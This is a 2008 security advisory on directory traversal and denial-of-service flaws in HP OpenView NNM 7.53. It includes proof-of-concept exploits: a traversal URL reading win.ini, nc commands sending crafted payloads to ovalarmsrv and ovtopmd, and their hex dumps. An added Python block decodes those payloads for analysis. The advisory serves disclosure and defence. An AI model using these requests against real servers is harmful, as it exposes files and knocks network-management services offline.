[NT] HP OpenView NNM Directory Traversal and Multiple Denials of Service

Subject: [NT] HP OpenView NNM Directory Traversal and Multiple Denials of Service
Date: 16 Apr 2008 19:44:56 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  HP OpenView NNM Directory Traversal and Multiple Denials of Service
------------------------------------------------------------------------


SUMMARY

 <http://www.openview.hp.com/products/nnm/> OpenView NNM "automates the 
process of developing a hyper-accurate topology of your physical network, 
virtual network services and the complex relationships between them. It 
then uses that topology as the basis for intelligent root cause analysis 
to enhance network availability and performance." Multiple denial of 
service vulnerabilities as well as a directory traversal vulnerability have 
been discovered in HP's OpenView NNM.

DETAILS

Vulnerable Systems:
 * HP OpenView Network Node Manager version 7.53

CGIs directory traversal
The CGIs shipped with NNM contain code that filters characters considered 
malicious in the parameters passed by clients, for example to prevent 
directory traversal, XSS and similar attacks.

The only path delimiter these CGIs filter is the backslash, so an attacker 
who uses the forward slash instead can read arbitrary files from the disk 
on which NNM is installed.

Denial of Service in ovalarmsrv
The ovalarmsrv service listening on port 2954 can easily be frozen, with 
the CPU at 100% and no further requests handled on either of its ports 
(2953 and 2954), simply by sending an incomplete multi-line request. In 
short, the last numeric parameter of requests 25, 45, 46, 47 and 81 
specifies how many sub-arguments (one per line) follow. ovalarmsrv then 
enters a loop that terminates only when all the sub-arguments have been 
received; closing the connection, or not sending some or all of these 
arguments, freezes the entire service. The following are all the supported 
requests with their "sscanf" formats:

  REQUEST_CONTRIB_EVENTS  (22): "%d %d %s"
  REQUEST_PRINT           (25): "%d %d %d %d %s"
  REQUEST_DETAILS         (33): "%d %d %s"
  REQUEST_EVENT_DELETE    (35): "%d %d %s"
  REQUEST_EVENT_ACK       (36): "%d %d %s"
  REQUEST_RUN_ACTION      (37): "%d %d %s %s"
  REQUEST_SPECDATA        (41):
  REQUEST_EVENT_UNACK     (44): "%d %d %s"
  REQUEST_SAVE            (45): "%d %d %d %d %s"
  REQUEST_CAT_CHANGE      (46): "%d %d %d %[^\n]"
  REQUEST_SEV_CHANGE      (47): "%d %d %d %[^\n]"
  REQUEST_CONF_ACTIONS    (48): "%d %d\n"
  REQUEST_RESTORE_STATE   (62): "%d %[^\n]"
  REQUEST_SAVE_DIR        (63):
  REQUEST_LOCALE          (66): "%d"
  REQUEST_FORMAT_PRINT    (81): "%d %d %d %d %s"
  REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]"

NULL pointer in ovalarmsrv
The parameter that specifies the number of sub-arguments described above is 
also used to allocate an initial block of dynamic memory (value * 2) for 
storing the sub-arguments, which is then reallocated when needed.

Specifying a number of sub-arguments too large to be allocated makes the 
allocation fail and return a NULL pointer, and the subsequent use of that 
pointer crashes the service.

Process termination in ovtopmd
The ovtopmd service listening on port 2532 recognises a special packet type 
(0x36) that forces the process to terminate ("Exiting due to request of 
ovtopmd -k."), so an attacker can send this packet to cause a denial of 
service.

Exploits:
For the directory traversal:
http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini

For the denials of service:
  nc SERVER 2954 -v -v -w 2 < closedviewx1.txt
  nc SERVER 2954 -v -v      < closedviewx2.txt
  nc SERVER 2532 -v -v      < closedviewx3.txt

closedviewx1.txt
0000000 3532 3020 3020 3120 2030 6f62 6d6f 000a
000000f

closedviewx2.txt
0000000 3532 3520 3020 3220 3431 3437 3338 3436
0000010 2037 6f62 6d6f 350a 2033 4141 4141 4141
0000020 4141 4141 4141 4141 4141 4141 4141 4141
0000030 4141 4141 4141 4141 4141 4141 4141 000a
000003f

closedviewx3.txt
0000000 0000 0400 0000 3600
0000008
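The three files above are `od -x` style hex dumps (16-bit little-endian words, hex offsets, total byte count on the last line). The following added Python example, which is not part of the original advisory or of NNM, decodes them back to bytes and applies the checks the advisory implies a hardened daemon would need: a bound on the declared sub-argument count of requests 25, 45, 46, 47 and 81 before memory is allocated for it, and a comparison of the declared count with what actually arrived instead of looping until the count is reached. The ovtopmd framing (a 4-byte big-endian length followed by a body ending in the type byte 0x36) is inferred from the 8-byte dump and is an assumption, as is the MAX_SUBARGS bound.

```python
"""Decode the advisory's od-style dumps and analyse each payload.  Added
example, not code from the advisory or from NNM.  The ovalarmsrv request
formats come from the advisory's sscanf list; the ovtopmd framing and the
MAX_SUBARGS bound are assumptions."""
import struct

# Dumps copied from the advisory: od -x output, 16-bit little-endian words,
# hex offsets, the final line being the total byte count.
DUMP_X1 = """0000000 3532 3020 3020 3120 2030 6f62 6d6f 000a
000000f"""
DUMP_X2 = """0000000 3532 3520 3020 3220 3431 3437 3338 3436
0000010 2037 6f62 6d6f 350a 2033 4141 4141 4141
0000020 4141 4141 4141 4141 4141 4141 4141 4141
0000030 4141 4141 4141 4141 4141 4141 4141 000a
000003f"""
DUMP_X3 = """0000000 0000 0400 0000 3600
0000008"""

# Requests whose last %d declares how many sub-argument lines follow,
# mapped to the number of %d fields in their sscanf format (advisory list).
SUBARG_REQUESTS = {25: 4, 45: 4, 46: 3, 47: 3, 81: 4}
MAX_SUBARGS = 1024           # assumed sane bound; NNM 7.53 applies none
OVTOPMD_KILL_TYPE = 0x36     # packet type that makes ovtopmd exit


def od_to_bytes(dump: str) -> bytes:
    """Reverse `od -x`: each word was printed as a native little-endian
    16-bit value, so pack it back with '<H'; the offset-only last line
    gives the real length (the final word may carry a 0x00 pad byte)."""
    lines = dump.strip().splitlines()
    total = int(lines[-1], 16)
    out = bytearray()
    for line in lines[:-1]:
        for word in line.split()[1:]:
            out += struct.pack("<H", int(word, 16))
    return bytes(out[:total])


def analyse_ovalarmsrv(payload: bytes) -> dict:
    """Emulate the header parse: the first line's leading %d fields are
    read as sscanf would; for the multi-line requests the last %d is the
    number of sub-argument lines the daemon then loops waiting for."""
    header, _, rest = payload.partition(b"\n")
    fields = header.decode("ascii", "replace").split()
    req = int(fields[0])
    n_ints = SUBARG_REQUESTS.get(req)
    if n_ints is None:
        return {"request": req, "multiline": False}
    declared = int(fields[n_ints - 1])
    supplied = [line for line in rest.split(b"\n") if line]
    return {
        "request": req,
        "multiline": True,
        "declared": declared,
        "supplied": len(supplied),
        # value * 2 is the initial allocation the advisory describes; once
        # it no longer fits a 32-bit signed int the request yields NULL.
        "alloc_request": declared * 2,
        "oversized": declared > MAX_SUBARGS,
        # a fixed daemon compares what arrived with what was promised
        # instead of blocking until the promised count is reached
        "incomplete": len(supplied) < declared,
    }


def parse_ovtopmd(payload: bytes) -> dict:
    """Assumed framing: 4-byte big-endian body length, then the body whose
    last byte is the packet type."""
    (length,) = struct.unpack(">I", payload[:4])
    body = payload[4:4 + length]
    return {"length": length, "type": body[-1],
            "kill": body[-1] == OVTOPMD_KILL_TYPE}


if __name__ == "__main__":
    for name, dump in (("closedviewx1", DUMP_X1), ("closedviewx2", DUMP_X2)):
        raw = od_to_bytes(dump)
        print(name, raw, analyse_ovalarmsrv(raw))
    raw3 = od_to_bytes(DUMP_X3)
    print("closedviewx3", raw3.hex(), parse_ovtopmd(raw3))
```

Decoded, closedviewx1.txt is a REQUEST_PRINT header promising 10 sub-arguments and sending none (the freeze), closedviewx2.txt promises 2147483647 of them so that value * 2 can never be allocated (the NULL pointer), and closedviewx3.txt is the 8-byte ovtopmd packet carrying type 0x36.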


ADDITIONAL INFORMATION

The information has been provided by Luigi Auriemma 
<mailto:aluigi@autistici.org>.
The original article can be found at:  
http://aluigi.altervista.org/adv/closedview_old-adv.txt


